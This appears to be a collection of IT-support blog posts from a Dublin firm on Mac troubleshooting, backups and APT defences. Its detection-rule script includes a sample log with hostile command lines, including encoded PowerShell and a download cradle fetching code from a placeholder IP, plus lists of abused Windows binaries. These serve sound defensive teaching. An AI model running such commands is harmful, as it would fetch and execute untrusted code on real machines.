A great OWASP EU conference last week in Belfast, highlighting some of the most dangerous application security risks currently out there. Ironically, on the second day of the conference a lot of message alerts could be heard throughout the conference halls as news of the WannaCry ransomware attack on the NHS began to break.
In the mid 1980s, a Japanese psychiatrist working in France noticed a disproportionate number of his holidaying fellow countrymen and women being admitted to Paris hospitals with accelerated heartbeats, shortness of breath and disorientation. After some investigation, he discovered that these tourists were in a state of shock. They had grown up with an idealised image of a city of beauty, culture and romance. But when they arrived, they discovered the reality was quite different. They found Paris to be noisy and unclean, at total variance with their idealised image of the city. He dubbed this condition “Paris Syndrome”. As a result, the Japanese embassy set up a helpline in Paris to assist their citizens experiencing this condition.
This sort of phenomenon is not restricted to Paris or iconic tourist locations. Over the last two to three years, we’ve seen the same sort of inflated expectation among newbie Mac users. Individual users and business users buy Apple Macs expecting that, once they have a Mac, all their computer woes will be over forever and ever in a fairytale-esque sort of way.
They buy an iMac or MacBook, bring it back to their office or home and then cannot understand what all the hype was about. And while they might not have accelerated heartbeats, shortness of breath or disorientation (well, maybe just a little bit…), they are in a mild state of disappointment that their computer problems have not magically disappeared. Some of these problems are pretty basic but very annoying. Take, for example, the user who buys an expensive iMac and discovers that it cannot maintain a stable Wi-Fi connection, when their Windows system connected just fine. Or the user who discovers that Mail.app keeps losing its connection to the IMAP server, so that emails can neither be sent nor received. Or they find that iCloud continually misfires when it comes to syncing data between devices. Or they discover that each OS X update brings a plethora of frustrating side-effects. Or they discover that the Spotlight search feature can’t seem to find anything. Or they discover that the iWork office productivity suite has so many bugs in it, it should feature in National Geographic magazine.
Just like Paris, Apple devices are really nice to look at. But they are certainly not perfect and don’t provide a computing utopia.
RealClear IT support are based in Dublin, Ireland and have been fixing Mac computers with love since 2003. Like fixing an old jalopy, fixing the quirks and foibles of Apple hardware and OS X software does actually grow on you! Most of the problems mentioned above can be remedied.
Lately, many Mac users have been asking us about the best way to run Windows on their Apple Mac system. The Windows operating system is still needed by some users to run Windows applications that still cannot run natively on a Mac such as Sage 50 Accounts, Sage Instant Payroll, SolidWorks or Revit to name but just a few. So, rather than deploying both a Mac and Windows system, you can configure your Mac to run the two simultaneously whilst enjoying the best of both worlds.
Reaching dual-operating system nirvana
The two principal ways of reaching this dual operating system nirvana are Apple’s native Boot Camp and third-party virtualisation software such as VMware Fusion or Parallels. There are pros and cons to each approach. Going down the Boot Camp route means that each time your Mac is powered up, you will be presented with the option to boot into OS X (Mac) or Windows. This usually works fine. But for some users, it can be extremely time-consuming to keep rebooting their Macs just to access the Windows partition.
The virtualisation route
This is where VMware Fusion or Parallels virtualisation software comes into play. Using these applications, you boot into OS X first and start Windows with the click of a button. Windows opens up from within OS X (in the same way that any Mac application would), negating the need to reboot your Mac. The virtualisation route offers slightly slower performance than Boot Camp, but for an application like Sage 50 Accounts the difference is barely perceptible. Whichever route you take, remember that the Windows side is a full Windows installation: it needs its own security updates and anti-malware just like any Windows PC, and a Boot Camp partition or a virtual machine that only gets booted once a month is a Windows system that has missed a month of patches.
Which is faster, VMware Fusion or Parallels?
In our experience, the speed of VMware Fusion or Parallels varies depending on which applications you intend to run and whether you’re using a mechanical or SSD drive. Performance also depends on which version of the virtualisation software you’re using. A bit like a grape harvest, the performance offered by the two stalwarts of Apple virtualisation software varies from year to year. Some years VMware’s offering has the performance edge; other years Parallels offers a faster Windows-within-a-Mac experience.
Computer systems disconnecting from Wi-Fi when you are trying to get some important work done can make for an extremely exasperating experience.
We recently helped a Dublin advertising agency with such a problem. Their iMacs and MacBooks would stay connected to their Virgin Media Thomson TWG870 Wi-Fi router for hours. But as soon as their Macs went into sleep mode and woke up again, the operating system would wake but the wireless connection would not, leaving users in the office frustrated and cursing like sailors. Unfortunately, this is a glitch in many versions of OS X (10.8 to 10.12) which Apple has still not fully remedied. However, in most cases, the solution is nice and simple.
This problem occurs because OS X seems to “forget” which wireless network it had joined before going to sleep. For example, there might be four or five wireless networks such as “hotel wifi”, “meeting room wifi”, “guest wifi” etc. stored in the network settings, and upon waking from sleep OS X does not know which one to connect to. To remedy this, go to System Preferences > Network > Wi-Fi > Advanced. Then, in the “Preferred Networks” panel, delete all the networks listed using the “-” button, followed by “OK”.
Now go back into the Network panel and click on “Location” followed by “Edit Locations”. Click on the “+” and give your network location a new name like “New Office Network”. Click on “Done” followed by “Apply”, then join the office Wi-Fi network once so it becomes the only preferred network in that location. This “locks in” the wireless network on your iMac or MacBook, meaning that the next time it goes to sleep it will not lose its wireless connection upon waking.
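The same reset, scripted with macOS’s built-in networksetup command so it can be rolled out to every Mac in an office rather than clicked through one machine at a time. This is an added example and not part of the original post or RealClear’s own tooling. It assumes an administrator account (networksetup prompts for authorisation, or run it with sudo), assumes the Wi-Fi port is reported as “Wi-Fi” or “AirPort” by networksetup (it is on every Mac we know of), and uses the location name “New Office Network” from above. Setting DRY_RUN=1 prints the commands instead of running them.

```shell
#!/bin/sh
# Added example: automate the Preferred Networks / Location reset described above.
# Requires an admin user; run as `sudo sh wifi_reset.sh --apply ["Location name"]`.

run() {  # DRY_RUN=1 prints the command instead of executing it
  if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Reads `networksetup -listallhardwareports` output on stdin and prints the
# device name (usually en0) that follows the Wi-Fi/AirPort hardware port line.
parse_wifi_device() {
  awk '/^Hardware Port: (Wi-Fi|AirPort)$/ { getline; print $2; exit }'
}

wifi_device() {
  networksetup -listallhardwareports | parse_wifi_device
}

# reset_wifi_location <device> <location name>
reset_wifi_location() {
  dev=$1; loc=$2
  # Record what is being discarded, then clear the preferred list for this port.
  run networksetup -listpreferredwirelessnetworks "$dev"
  run networksetup -removeallpreferredwirelessnetworks "$dev"
  # A new Location; "populate" copies the current network services into it.
  run networksetup -createlocation "$loc" populate
  run networksetup -switchtolocation "$loc"
}

case "${1:-}" in
  --apply)
    dev=$(wifi_device)
    [ -n "$dev" ] || { echo "no Wi-Fi interface found" >&2; exit 1; }
    reset_wifi_location "$dev" "${2:-New Office Network}"
    echo "Done: now join the office Wi-Fi once so it becomes the only preferred network." ;;
esac
```

After the switch, the Mac has no preferred networks in the new location, so the user joins the office SSID once from the Wi-Fi menu; from then on that is the only network the machine will try to rejoin after sleep.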
On follow-up a week later, all users were relieved to have a robust wireless connection. They could continue their work uninterrupted by internet blackouts or by swearing colleagues.
If you’re having wireless network problems with your Apple Mac in Dublin, RealClear are here to help. We work with most wireless networks including those from Virgin Media, Eir, Three, Vodafone and Magnet. You can contact RealClear on 01- 685 4833.
We are still shocked at the number of business owners (legal professionals, consultants, etc.) who contact us with problems with their indigo.ie or eircom.net email address. Whilst we can help these users to get their email fully operational again, using outdated domains such as indigo.ie as a professional email address is wrong for so many reasons!
1) The indigo.ie and iol.ie domains were among the first native email providers in Ireland when the internet started to become mainstream (1994 – 2000), with eircom.net coming on stream circa 1999. The email service provided by these domains served a purpose back then for basic email, but times have changed. Most email services now need to support the IMAP protocol (over TLS), which is needed for email on mobile devices and for keeping several devices in sync.
2) Domains such as indigo.ie and iol.ie have long since changed hands from their original owners. Their new owners give these email domains only skeleton maintenance and support.
3) Using older domains like indigo.ie means you get very poor server-level spam filtering. This means the time-consuming nuisance of wading through emails from Nigerian princes, but it also poses a security risk: phishing emails and malicious attachments that a modern service would have filtered land straight in your inbox.
4) Using an indigo.ie or eircom.net email address does not project a professional image for your business.
5) You are at the mercy of their new owners. For example, the current owners of indigo.ie, Eir, might decide to pull the plug on indigo.ie any day leaving you in the lurch.
RealClear can help migrate your business to a more robust and reliable email platform which offers spam filtering and higher levels of security.
Most updates to the OS X operating system are trouble-free. However, a number of clients have recently contacted us about a “blank screen and cursor” problem after they installed an update for macOS Sierra. Upon rebooting their iMac or MacBook they were greeted by a cursor and a blank screen. Not a sight you want to see when you just want to get some work done. The problem appears to be related to corruption of the login window “plist” preferences file and the “Apple Upgrade” marker file left behind by the installer. Apple have not yet released a fix for this issue, nor have they documented it in their knowledge base, but our solution is quite easy to implement.
1) Start your MacBook or iMac while holding the “Command” and “S” keys simultaneously to boot into single-user mode. (If FileVault is turned on, you will be asked to unlock the disk first.)
2) After a minute or two you will be presented with a command line terminal screen. (This is a black screen where you can input commands)
3) Now type the following commands in sequence, pressing Enter after each one. The first remounts the system volume read-write (it is read-only in single-user mode); the second and third delete the two corrupt files. The login window preferences are recreated with defaults on the next boot.
/sbin/mount -uw /
rm -f /Library/Preferences/com.apple.loginwindow.plist
rm -f /var/db/.AppleUpgrade
4) Finally, type reboot and press Enter. Single-user mode does not restart the Mac on its own, so this last step is needed. Your MacBook or iMac should then start up normally and you should be back in business! Note that rm -f removes files silently and does not complain if a path is mistyped, so check each line before pressing Enter; if the symptom remains after the reboot, the most likely cause is a typo in one of the paths.
Last month RealClear IT Support attended the 44Con IT security conference in London. There were lots of interesting talks given, including those on threat intelligence, network security, application security, operating system attacks and hardware hacks.
But one of the consistent themes of the conference, and one of the areas keeping CIOs awake at night, is the Advanced Persistent Threat. APTs are targeted, persistent, multi-phased and sophisticated intrusions which operate stealthily on the modern computer network. Their ultimate goal is to exfiltrate data from a business or organisation to the attacker’s “command and control” servers. This might sound very X-Files-like, but APTs are a reality in today’s threat landscape. Even with traditional security defences in place, they can go unnoticed in your network for years.
One of the first high-profile APT campaigns was discovered in 1998, when a computer technician at an American company, ATI Corp, identified a remote access connection from their network to a US Air Force base. The RAT (remote access Trojan) was initiated every morning at 3am. The technician reported his findings to law enforcement, and a specialised team of military and information security specialists from the US government was mustered. After months of research, the “Moonlight Maze” investigation found that several businesses and universities were being used extensively as proxies for the attacks: RAT connections proxied through local businesses and universities look much less suspicious than connections emanating from Russia or China. The attackers used Telnet and FTP to exfiltrate thousands of documents from US military sources.
Since then, several other high-profile APTs have been discovered, including those which hit RSA (ironically a computer security company) and the New York Times. In 2011 RSA, a leading provider of two-factor authentication security tokens to banks, finance and healthcare organisations, was hit by an APT. As with Moonlight Maze, the FTP protocol was used to exfiltrate files, which compromised their SecurID system.
The New York Times was attacked by an APT in 2012 when its journalists started investigating the relatives of Wen Jiabao, the then Chinese premier. The threat went unnoticed for months. The corporate passwords of every employee were stolen. Over 45 pieces of custom malware were installed. The Symantec endpoint security software which the company was using to protect its PCs identified only one of them (which it quarantined).
Vectors of attack
One worrying aspect of APTs is the simplicity of the initial attack vector. For example, the RSA hack was traced back to a single phishing email sent to a small number of staff. It contained an Excel worksheet which was completely blank except for an “X” in one of the cells. Out of curiosity, an employee opened it, and nothing appeared to happen. Unbeknownst to them or the firm’s security team, the spreadsheet contained an embedded Flash object which exploited a then-unpatched (zero-day) Flash vulnerability, installed the Poison Ivy remote access Trojan and connected to the attackers’ command-and-control server. Further payloads were then surreptitiously downloaded. This seemingly innocuous action gave the attackers the keys to the kingdom, as it were: the compromised PC was used as a launch pad for attacks across RSA’s internal network.
There are several other examples of APTs getting in through a seemingly small opening. The “Duqu” malware, discovered in September 2011, used a TrueType font parsing vulnerability triggered from a Microsoft Word document as its initial attack vector. The payload installs malware which then connects to the attackers’ command-and-control servers over TCP ports 80 and 443 using a custom protocol. For port 80 traffic, Duqu uses steganography to hide its data inside JPEG files, and it XOR-encrypts the data captured by its keylogger. “Flame” is another piece of malware used in APT campaigns. Discovered in 2012, it spreads via USB devices and by impersonating the Windows Update service (a favourite strategy of the NSA also…). Unusually large at around 20MB, it can take screenshots, intercept email and switch on a PC’s microphone, and it communicates with its command-and-control servers over HTTP, HTTPS and SSH. Using such everyday protocols makes it easy to slip under the radar of even the most sophisticated firewalls. Or consider “Red October”, which among its many modules has ones that pull data from connected smartphones (iPhones included) and ones that brute-force SNMP community strings on network equipment. Once installed, it collects data via plugins for Microsoft Office and Adobe Reader, and it evades detection by XOR-encrypting its main executable. For the initial infection, Red October uses booby-trapped Word and Excel documents delivered by spear-phishing emails.
Implications for your business
Initially, most of these attacks did not use highly sophisticated techniques to break into their victims. They used what could be described as “everyday software” coupled with social engineering (phishing) to get a foothold. In your business environment, there are some simple steps you can take to counter such threats.
Office and Adobe PDF documents should be opened with extreme prudence. Users should be trained to spot anomalous emails and attachments, and to know how to handle them safely (report rather than open).
You should be using a recent version of Microsoft Office for maximum protection. Every version from Microsoft Office 2010 onwards includes “Protected View”, which acts as a sandbox and allows documents from untrusted sources to be opened in a safer, read-only way. Alternatively, you could use the free LibreOffice suite, but this does not suit every business environment.
Antivirus products alone cannot be trusted, as most of them still rely on signature-based scanning, which cannot detect malware it has never seen before, such as the custom tools used in APT attacks or a zero-day exploit. The New York Times hack showed us that 44 out of 45 strains of malware went undetected by their Symantec endpoint security software. Ancillary software like Java and Flash Player should always be kept up to date (or removed entirely if nobody needs it).
All your operating systems should be fully patched and updated. This includes users of Mac OS X (many of whom still believe that “only Windows users get viruses”). Be suspicious of update requests that appear out of the blue, especially from a web page or email: Flame impersonated Windows Update, so install updates through the operating system’s own update mechanism only. You can update your OS manually or, if you want to automate it a little, use software like Personal Software Inspector from Flexera Software (Windows).
A stateful application-layer firewall should be used. These can be effective in flagging connections to anomalous servers and in recognising traffic that does not look like the protocol expected on a port (for example Duqu’s custom protocol on ports 80 and 443). Bear in mind, though, that such a firewall cannot see inside encrypted traffic unless you deploy TLS inspection; without it, you have to choose between letting encrypted connections it cannot decode through, which is where malware like Flame hides, or blocking them, which breaks most of the web. The realistic middle ground is to inspect what you can and to alert on encrypted connections to unknown or newly registered destinations.
A host-based intrusion detection system (HIDS) will be much more effective than anti-virus alone for detecting the more sinister threats. A HIDS can perform log analysis, Windows registry monitoring and rootkit detection. Moreover, a HIDS is far more likely to notice the tell-tale behaviour of a booby-trapped Office document, such as Word, Excel or Adobe Reader spawning cmd.exe, PowerShell or rundll32, or code being injected into another process.
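To make the last point concrete, here is the kind of rule a log-based HIDS applies to process-creation events. This is an added example, not code from the original post or from any HIDS product: it reads a constructed process-creation log (the six sample events are made up for this illustration; the field layout, timestamp|host|parent image|child image|command line, is an assumption and not any real product’s format) and flags three things: an Office or Reader process spawning a script interpreter or system utility, an encoded PowerShell command line, and a download cradle. It watches for the child-process pattern rather than in-memory injection itself, which needs the HIDS’s own instrumentation.

```shell
#!/bin/sh
# Added example: flag suspicious process-creation events from a pipe-delimited
# export of the form  timestamp|host|parent_image|child_image|command_line
# (constructed format; adapt the field numbers to your own log source).

office_spawn_alerts() {  # reads events on stdin, prints one ALERT line per event
  awk -F '[|]' '
    BEGIN {
      # Document readers that have no business launching interpreters.
      split("winword.exe excel.exe powerpnt.exe outlook.exe acrord32.exe", p, " ")
      for (i in p) office[p[i]] = 1
      # Interpreters and living-off-the-land binaries commonly spawned by macro droppers.
      split("cmd.exe powershell.exe wscript.exe cscript.exe mshta.exe rundll32.exe regsvr32.exe certutil.exe", c, " ")
      for (i in c) lolbin[c[i]] = 1
    }
    NF < 5 { next }   # skip malformed lines rather than mis-parse them
    {
      np = split($3, pa, "[\\\\/]"); parent = tolower(pa[np])   # basename of parent image
      nc = split($4, ca, "[\\\\/]"); child  = tolower(ca[nc])   # basename of child image
      cmd = tolower($5)
      reason = ""
      if ((parent in office) && (child in lolbin))
        reason = reason "office-parent-spawned-" child ";"
      # -e/-ec/-en/-enc/-EncodedCommand: PowerShell accepts any unique prefix.
      if (cmd ~ / -(e|ec|en|enc|encodedcommand) /)
        reason = reason "encoded-powershell;"
      if (cmd ~ /downloadstring|downloadfile|net\.webclient/)
        reason = reason "download-cradle;"
      if (reason != "")
        printf "ALERT %s host=%s parent=%s child=%s reason=%s\n", $1, $2, parent, child, reason
    }'
}

sample_events() {  # constructed sample log; only the first, second, fourth and sixth should alert
cat <<'EOF'
2017-05-12T09:14:02Z|WS-ACC-03|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2017-05-12T09:14:03Z|WS-ACC-03|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2017-05-12T09:20:11Z|WS-ACC-07|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|"WINWORD.EXE" /n "C:\Users\sue\Desktop\invoice.docx"
2017-05-12T09:21:45Z|WS-ACC-07|C:\Program Files\Microsoft Office\Office16\EXCEL.EXE|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Users\sue\AppData\Local\Temp\a.dll,Run
2017-05-12T09:30:00Z|WS-ACC-01|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe
2017-05-12T09:31:12Z|WS-ACC-09|C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
EOF
}

# `sh office_spawn.sh --demo` runs the sample; `sh office_spawn.sh events.log` scans a real export.
case "${1:-}" in
  --demo) sample_events | office_spawn_alerts ;;
  "")     ;;
  *)      office_spawn_alerts < "$1" ;;
esac
```

The user double-clicking invoice.docx (third line) and an administrator opening a command prompt (fifth line) are left alone; the point is that the parent/child relationship, not the presence of cmd.exe or PowerShell, is what separates ordinary activity from a macro dropper, and that is information antivirus signature scanning never looks at.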
There is no magic bullet for IT security, but having a layered approach greatly enhances your security and reduces the risk of your systems being compromised.
Concerned about IT security? You can contact RealClear IT support in Dublin on 01 – 685 4833. Fast remote IT support nationwide. On-site IT support for the Dublin area. Practical and no-nonsense advice.
It has been said ad infinitum on this blog that data backup is one of the most important IT tasks you will ever perform in your business. Servers, desktops, laptops and tablets are all replaceable. Your data is not. But we keep seeing the same fundamental backup mistakes again and again. These leave your business wide open to data loss.
So, let’s get down to the brass tacks and look at some mindsets, assumptions and scenarios which lead to data loss.
1. The “I don’t have time to back-up” mindset held by some SME owners is short-sighted. If you perceive data backup taking up too much time, wait till you see how long it takes to recover from a catastrophic disk failure or a ransomware attack. A properly configured backup system should not take up any of your time. It will just run in the background automatically – minimal human intervention needed.
2. “We’re using mostly new computers here, we don’t need to back up.” Having the newest and shiniest IT equipment does not exempt you from backing up. Hard drive failure rates follow what is known as the “bathtub curve”: the probability of failure is elevated in the first 12 months of a disk’s life (early failures), flattens out, and then climbs again as the drive wears out. Moreover, cryptographic ransomware does not care how new your equipment is.
3. “Our IT support guy said all the data was being backed up to that box over there” We’ve been hearing this old chestnut for years. When you do check the timestamps of backups of “that box over there”, which is normally a server, NAS or external hard drive, you sometimes find that their backup is months out-of-date. The only thing “the box over there” was amassing was cobwebs.
4. The same phenomenon happens with Cloud backup solutions. Some SME owners will say “our data is being backed up to the Cloud” as if some divine intervention were spiriting their data safely into the clouds. Your backups need to be verified, no matter how reputable you think your Cloud backup service is. And on the subject of Cloud backup, it is good practice on some idle Friday afternoon to perform a mock restoration of data: pick a handful of files, restore them to a scratch folder and check that they open and match the originals. We have heard several horror stories of SMEs restoring from Cloud backup services only to find all their data corrupted.
5. There are still some SME owners in Dublin who only perform local (i.e. not off-site) backups. While Dublin might not get tornadoes or severe lightning strikes, the risk of fire, burst pipes, flood, sabotage, theft and ransomware attacks is ever present.
6. With the multiplicity of data-holding devices such as smartphones, tablets, desktops, laptops, external drives and USB memory keys, data sprawl sets in. This results in many office environments having a hodge-podge of different data sets. This is why your data needs to be categorised, prioritised and centralised.
7. Once you have your data categorised, your back-up plan should endeavour to back-up all data to a central file-server (hosted or local). Some SME owners (and some IT admins, alas) make the mistake of backing-up each system to a direct attached storage device. These devices (such as USB external drives) are then used to back up other systems. What results is a messy data sprawl, making reliable off-site back-up more difficult and data restoration processes more time consuming.
8. Some backup software vendors make a virtue of how comprehensive their backup products are. For example, their software might offer one hundred different ways to back up. Complexity does not make backup software better or more reliable; it just raises the risk of human error. Complex backup software is anathema to good backup practice simply because users hate using software that is designed like a tax form. Simple, easy-to-use backup software will trump complex software any day; Apple’s Time Machine is a classic example. When software becomes too complex to use, some users stop using it and resort to drag-and-drop backups onto a USB memory stick… argh.
9. Encryption-based ransomware attacks have been a real game-changer in terms of backup system configuration. Some of the recent variants of ransomware have been extremely agile in propagating across networks from just one infected Mac or Windows system. Good backup systems are designed with such eventualities in mind: they keep multiple versions of each file, so you can roll back to the copy from before the encryption started, and they keep the backup set isolated from the machines being backed up (the workstation has no credentials that can overwrite or delete backups, or there is an offline copy), so that ransomware which reaches a mapped backup drive cannot encrypt your backups as well.
10. Finally, it is important to remember that every IT set-up is constantly changing. Employees leave and new employees arrive. Hardware gets changed. Software gets changed. A good backup system should be flexible enough to be easily re-configured to allow for such changes.
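Points 3 and 4 above come down to one habit: check the backup, do not take it on trust. The following script is an added example (not RealClear’s own backup tooling and not from the original post) of the two checks that catch “the box over there”: it records a SHA-256 manifest of a backup set and later verifies that every file is still present with the same contents and that something in the set has actually been written recently. The directory layout, manifest name and the one-day freshness limit are assumptions for the illustration; it uses sha256sum where available (Linux) and shasum on a Mac.

```shell
#!/bin/sh
# Added example: integrity + freshness check for a backup directory.
#   make_manifest  <backup_dir> <manifest_file>            # record SHA-256 of every file
#   verify_backup  <backup_dir> <manifest_file> <max_age_days>
# verify_backup exit codes: 0 ok, 1 missing/modified file or empty manifest, 2 stale backup.

sha256_of() {  # portable: GNU coreutils sha256sum or macOS/BSD shasum
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | awk '{print $1}'
  else shasum -a 256 "$1" | awk '{print $1}'; fi
}

make_manifest() {
  mm_dir=$1; mm_out=$2
  : > "$mm_out"
  # Relative paths, sorted, so two manifests of the same set can be diffed.
  ( cd "$mm_dir" && find . -type f ! -name "$(basename "$mm_out")" -print | sort ) |
  while IFS= read -r rel; do
    printf '%s  %s\n' "$(sha256_of "$mm_dir/$rel")" "$rel" >> "$mm_out"
  done
}

verify_backup() {
  vb_dir=$1; vb_manifest=$2; vb_max_age=$3; vb_bad=0
  [ -s "$vb_manifest" ] || { echo "EMPTY    manifest $vb_manifest has no entries"; return 1; }
  while IFS= read -r line; do
    expected=${line%%  *}; rel=${line#*  }        # "<hash><two spaces><path>"
    if [ ! -f "$vb_dir/$rel" ]; then
      echo "MISSING  $rel"; vb_bad=1; continue
    fi
    actual=$(sha256_of "$vb_dir/$rel")
    [ "$actual" = "$expected" ] || { echo "MODIFIED $rel"; vb_bad=1; }
  done < "$vb_manifest"
  [ "$vb_bad" -eq 0 ] || return 1
  # Freshness: at least one file written within the last <max_age_days> days.
  if [ -z "$(find "$vb_dir" -type f -mtime -"$vb_max_age" | head -n 1)" ]; then
    echo "STALE    nothing in $vb_dir written in the last $vb_max_age day(s)"
    return 2
  fi
  echo "OK       $(wc -l < "$vb_manifest" | tr -d ' ') files verified, backup is fresh"
  return 0
}

# Stand-alone use:  sh verify_backup.sh record /Volumes/Backup/office manifest.sha256
#                   sh verify_backup.sh check  /Volumes/Backup/office manifest.sha256 1
case "${1:-}" in
  record) make_manifest "$2" "$3" ;;
  check)  verify_backup "$2" "$3" "${4:-1}" ;;
esac
```

Run the check from a scheduled job and alert on any non-zero exit; a STALE result is exactly the months-out-of-date backup from point 3, and a MODIFIED result on files that should not have changed is an early sign of either a failing drive or ransomware rewriting the backup set. A mock restore (point 4) is the same idea one step further: restore to a scratch directory and run verify_backup against the original manifest.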
Don’t have nightmares about data backup. RealClear IT Support is based in Dublin, Ireland. Our (local and hosted) backup systems are easy-to-use, reliable and secure. We also support Apple and Windows systems via our remote and on-site service. Call us on 01 685 4833 for some professional, experienced and practical advice.
The iPad has been a great boon for mobile computing, but unfortunately, it might not have all the files or applications needed to run your business. While it might do everything from web browsing to email, it will not run your Sage accountancy package or your AutoCAD design suite. This can be an inconvenience.
Picture the scene. You’re away from your office and, for the sake of travelling light, have only brought your iPad with you. But when on-site with a client you discover that an important file needed for a presentation or meeting is sitting back in your office on your iMac (or MacBook or Windows PC). This could mean making an SOS call to a colleague or family member to email you the file. Worst case, you have to postpone your meeting. Neither solution is ideal.
Thankfully, Splashtop Business allows you to quickly and securely log in to your MacBook, iMac, Mac Mini or Windows system using just your iPad. The process is relatively easy. You install Splashtop on each system which you would like to access remotely (and of course on the iPad itself). When you need to log in, all it takes is a few taps and you are virtually in front of your office computer. You can open applications, make changes, transfer files and even stream video. Data in transit is protected with TLS and 256-bit AES encryption, and Splashtop states that it supports HIPAA compliance. The usual caveats for any remote-access tool apply: whoever holds your Splashtop login is effectively sitting at your office computer, so protect that account with a strong, unique password and two-factor authentication, keep the office machine patched, and remove the remote-access software from any machine that no longer needs it.
A very neat app which can save you time and potentially a lot of hassle.
A couple of weeks ago, on 3rd April, the world became aware of an alleged cyber-attack on the law firm Mossack Fonseca in Panama. A couple of days later, it emerged that the attacker had leaked over 2.6TB of data, including over 4.8 million emails, 2.1 million PDF files, 1.1 million images and 320,166 text files, into the public domain. The files contained confidential financial information belonging to prominent politicians, actors, lawyers and business people. It was interesting to read the media coverage of this case. A lot of general media commentators cited the firm’s failure to update its WordPress and Drupal content management systems. While this possibly contributed to the ease of access which the hacker(s) had, the roots of this hack lie a lot deeper.
Firstly, the data which Mossack Fonseca held was not encrypted. Given its confidentiality and headline-worthiness, this was an egregious mistake. Storing confidential personally identifiable information in plain text is far from best practice: it should have been protected with whole-disk encryption (AES) or, at a bare minimum, file-level encryption. One caveat a practitioner should keep in mind: disk encryption protects data at rest, on a stolen or discarded drive, not data on a running server that an attacker has already broken into, where the files are served up decrypted. That is why the network and access controls below matter just as much.
The next mistake was having a public-facing mail server doubling as a document server. This means that a hacker who had compromised their website could, with a little more work, get into their emails and then their documents. Easy peasy. The mail server should have been in a DMZ, protected by an external and an internal firewall. The document server should have been on a separate, tightly restricted subnet reachable only by the systems and accounts that need it, with stringent logging (monitored by experienced IT professionals who can spot anomalies quickly) and protected by an APT detection system.
Once they had their network structure secured, they could then have worried about the technicalities at the presentation and application layers. Why was their email not using TLS? Why was WordPress (with its one-click update function) or Drupal not updated? Why were their WordPress plugins not updated? (In other words, the stuff that Sky News talks about after a cyber attack.)
Lastly, for a business dealing with such confidential information belonging to such prominent people, there appeared, from media reports at least, to be a very low level of cyber-risk awareness among senior and lower-ranking staff alike. It might have taken just one employee, or one egress-monitoring alert, to notice something was awry when 2.6TB of data was going out into the ether.
As a result of failing to have a secure IT infrastructure and a cyber risk-aware culture in place, Mossack Fonseca got worldwide negative publicity and severe reputational damage to their business.